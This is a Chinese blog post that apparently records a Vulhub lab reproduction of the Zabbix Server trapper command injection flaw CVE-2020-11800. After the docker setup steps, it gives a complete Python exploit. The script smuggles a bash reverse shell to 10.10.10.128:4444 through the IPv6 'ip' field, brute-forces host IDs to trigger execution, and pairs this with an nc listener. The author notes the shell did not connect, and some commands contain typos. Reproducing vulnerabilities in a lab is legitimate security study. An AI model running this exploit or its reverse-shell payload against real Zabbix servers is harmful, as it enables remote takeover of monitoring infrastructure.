CVE-2020-11800
Zabbix Server trapper命令注入漏洞(CVE-2020-11800)
Zabbix是由Alexei Vladishev开发的一种网络监控、管理系统,基于Server-Clinet架构。在CVE-2017-2824中,其Server端trapper command功能存在一处代码执行漏洞,而修复补丁并补完善,导致可以利用IPv6进行绕过,注入任意命令。
环境搭建
执行如下命令启动一个完整的Zabbix环境,包含Web端、Server端、1个Agent和MySQL数据库:
cd zabbix/CVE-2020-11800
dokcer-compose up -d
命令执行后,执行docker-compose ps 查看容器是否全部成功启动,如果没有,可以尝试重新执行docker-compose up -d。
利用该漏洞,需要你服务端开启了自动注册功能。
漏洞复现
- 使用脚本反弹shell,python3 zabbix.py 10.10.10.10
import sys
import socket
import json
import sys
def send(ip, data):
conn = socket.create_connection((ip, 10051), 10)
conn.send(json.dumps(data).encode())
data = conn.recv(2048)
conn.close()
return data
target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1"}))
for i in range(10000, 10500):
data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
if data and b'failed' not in data:
print('hostid: %d' % i)
print(data)
- nc连接shell
nv -lvnp 4444
- 反弹失败,不知道什么原因
分类:
Vulhub漏洞学习
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?